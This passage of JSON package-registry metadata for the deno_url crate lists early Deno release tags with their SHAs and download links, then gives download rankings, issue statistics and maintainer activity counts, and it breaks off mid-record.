name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-01T17:39:26.094Z","dependent_packages_count":22,"downloads":1510210,"downloads_period":"total","dependent_repos_count":191,"rankings":{"downloads":3.917281943158566,"dependent_repos_count":2.8252412075941487,"dependent_packages_count":1.8954283979543387,"stargazers_count":0.002334030949250387,"forks_count":0.05912878404767647,"docker_downloads_count":3.08896531333157,"average":1.9647299461725918},"purl":"pkg:cargo/deno_url","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_url","docker_dependents_count":30,"docker_downloads_count":23282372,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_url","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_url/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-01T13:55:36.167Z","issues_count":6642,"pull_requests_count":9658,"avg_time_to_close_issue":17154660.07956933,"avg_time_to_close_pull_request":1531229.652833002,"issues_closed_count":3806,"pull_requests_closed_count":8047,"pull_request_authors_count":584,"issue_authors_count":2483,"avg_comments_per_issue":2.5031616982836495,"avg_comments_per_pull_request":0.7206460965003106,"merged_pull_requests_count":7026,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":674,"past_year_pull_requests_count":1199,"past_year_avg_time_to_close_issue":1405483.9744680852,"past_year_avg_time_to_close_pull_request":1297781.037313433,"past_year_issues_closed_count":235,"past_year_pull_requests_closed_count":670,"past_year_pull_request_authors_count":187,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2210682492581602,"past_year_avg_comments_per_pull_request":1.1226021684737282,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":4,"past_year_merged_pull_requests_count":501,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":399,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/ap